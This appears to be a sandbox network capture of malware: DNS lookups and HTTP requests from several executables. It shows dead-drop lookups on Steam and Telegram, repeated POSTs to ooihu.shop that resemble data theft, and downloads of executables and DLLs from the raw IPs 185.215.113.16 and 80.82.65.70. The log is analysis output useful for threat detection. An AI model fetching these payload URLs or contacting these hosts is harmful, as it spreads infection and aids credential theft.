Set-Cookie: PHPSESSID=44h1o4ib6tuja1n4m60t2kn9no; expires=Sat, 05-Apr-2025 13:34:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=004%2BYGZem%2Fl4qkDPy6P05SWdoJkf2gRTcJoNdKfzBAhxVw5LxHGP8JAkDT7r96ZxwBnn5T2Ck3MldIbMMjss%2BlWih4ip0jdXHNwZqUvjszbbHbMYdxoyeiyfzRBgnxi1PKrB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8effbff478bc9f64-AMS
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=58044&min_rtt=57559&rtt_var=17116&sent=9&recv=8&lost=0&retrans=1&sent_bytes=3558&recv_bytes=605&delivery_rate=66902&cwnd=253&unsent_bytes=0&cid=27dd95a50b1324f0&ts=593&x=0"
DNS

dare-curbys.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

dare-curbys.biz

IN A

Response
DNS

print-vexer.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

print-vexer.biz

IN A

Response
DNS

impend-differ.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

impend-differ.biz

IN A

Response
DNS

steamcommunity.com

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
GET

https://steamcommunity.com/profiles/76561199724331900

Z9Pp9pM.exe

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 10 Dec 2024 19:47:59 GMT
Content-Length: 35597
Connection: keep-alive
Set-Cookie: sessionid=e0638d04927c44b7f6264257; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
DNS

78.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.210.23.2.in-addr.arpa

IN PTR

Response

78.210.23.2.in-addr.arpa

IN PTR

a2-23-210-78deploystaticakamaitechnologiescom
DNS

t.me

3EUEYgl.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/detct0r

3EUEYgl.exe

Remote address:

149.154.167.99:443

Request

GET /detct0r HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Tue, 10 Dec 2024 19:48:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12313
Connection: keep-alive
Set-Cookie: stel_ssid=c3ec1a80f38d5c744e_57915136407261548; expires=Wed, 11 Dec 2024 19:48:50 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

ooihu.shop

3EUEYgl.exe

Remote address:

8.8.8.8:53

Request

ooihu.shop

IN A

Response

ooihu.shop

IN A

116.203.10.31
DNS

ooihu.shop

3EUEYgl.exe

Remote address:

8.8.8.8:53

Request

ooihu.shop

IN A

Response

ooihu.shop

IN A

116.203.10.31
GET

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
POST

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4W4OPHD2DTRIM790ZMG4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

70.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.209.201.84.in-addr.arpa

IN PTR

Response
DNS

31.10.203.116.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.10.203.116.in-addr.arpa

IN PTR

Response

31.10.203.116.in-addr.arpa

IN PTR

static3110203116clientsyour-serverde
POST

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

e6.o.lencr.org

3EUEYgl.exe

Remote address:

8.8.8.8:53

Request

e6.o.lencr.org

IN A

Response

e6.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

88.221.135.115

a1887.dscq.akamai.net

IN A

88.221.135.106

a1887.dscq.akamai.net

IN A

88.221.134.115

a1887.dscq.akamai.net

IN A

88.221.135.113

a1887.dscq.akamai.net

IN A

88.221.135.97

a1887.dscq.akamai.net

IN A

88.221.135.114
DNS

e6.o.lencr.org

3EUEYgl.exe

Remote address:

8.8.8.8:53

Request

e6.o.lencr.org

IN A

Response

e6.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

88.221.135.115

a1887.dscq.akamai.net

IN A

88.221.135.97

a1887.dscq.akamai.net

IN A

88.221.135.106

a1887.dscq.akamai.net

IN A

88.221.135.114

a1887.dscq.akamai.net

IN A

88.221.134.115

a1887.dscq.akamai.net

IN A

88.221.135.113
GET

http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D

3EUEYgl.exe

Remote address:

88.221.135.115:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e6.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 345
ETag: "4A8B461D7D0867B834B6B3D97F9425BE3F43D6D6DD06929C18B94181B0AAE0B3"
Last-Modified: Tue, 10 Dec 2024 01:01:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16439
Expires: Wed, 11 Dec 2024 00:22:51 GMT
Date: Tue, 10 Dec 2024 19:48:52 GMT
Connection: keep-alive
DNS

21.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.236.111.52.in-addr.arpa

IN PTR

Response
DNS

61.45.26.184.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.45.26.184.in-addr.arpa

IN PTR

Response

61.45.26.184.in-addr.arpa

IN PTR

a184-26-45-61deploystaticakamaitechnologiescom
DNS

115.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

115.135.221.88.in-addr.arpa

IN PTR

Response

115.135.221.88.in-addr.arpa

IN PTR

a88-221-135-115deploystaticakamaitechnologiescom
POST

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----K6FKFCT00ZU3E37900RQ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R1DBSJMYMYM7QI5FCJM7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Content-Length: 300
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----SJWT2DT2NGVAAAIEUSR1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HVKNYUK6F37YM79RQ9R9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ooihu.shop/

3EUEYgl.exe

Remote address:

116.203.10.31:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----U3WBSRQQ9RQQIECJWLNG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: ooihu.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 10 Dec 2024 19:48:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/luma/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:04 GMT
Content-Type: application/octet-stream
Content-Length: 1847808
Last-Modified: Tue, 10 Dec 2024 19:19:40 GMT
Connection: keep-alive
ETag: "6758944c-1c3200"
Accept-Ranges: bytes
GET

http://185.215.113.16/steam/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:08 GMT
Content-Type: application/octet-stream
Content-Length: 1772032
Last-Modified: Tue, 10 Dec 2024 19:19:47 GMT
Connection: keep-alive
ETag: "67589453-1b0a00"
Accept-Ranges: bytes
GET

http://185.215.113.16/well/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /well/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:13 GMT
Content-Type: application/octet-stream
Content-Length: 971776
Last-Modified: Tue, 10 Dec 2024 19:17:52 GMT
Connection: keep-alive
ETag: "675893e0-ed400"
Accept-Ranges: bytes
GET

http://185.215.113.16/off/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /off/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:19 GMT
Content-Type: application/octet-stream
Content-Length: 2714624
Last-Modified: Tue, 10 Dec 2024 19:18:18 GMT
Connection: keep-alive
ETag: "675893fa-296c00"
Accept-Ranges: bytes
GET

http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:06 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/dll/key

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /dll/key HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:06 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/dll/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /dll/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:06 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 97296
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:07 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:09 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:11 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:13 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:15 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:18 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:20 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:22 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:24 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:27 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/files/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /files/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:29 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://80.82.65.70/soft/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /soft/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: d
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:32 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Disposition: attachment; filename="dll";
Content-Length: 242176
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://80.82.65.70/soft/download

f47698ce5b.exe

Remote address:

80.82.65.70:80

Request

GET /soft/download HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: s
Host: 80.82.65.70
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:34 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Disposition: attachment; filename="soft";
Content-Length: 1502720
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/octet-stream
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

70.65.82.80.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.65.82.80.in-addr.arpa

IN PTR

Response

70.65.82.80.in-addr.arpa

IN PTR

security criminalipcom
DNS

70.65.82.80.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.65.82.80.in-addr.arpa

IN PTR

Response

70.65.82.80.in-addr.arpa

IN PTR

security criminalipcom
POST

https://atten-supporse.biz/api

f3745b045c.exe

Remote address:

104.21.96.1:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=1rti7gd8m1q38lkot52qn3j6m1; expires=Sat, 05-Apr-2025 13:35:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
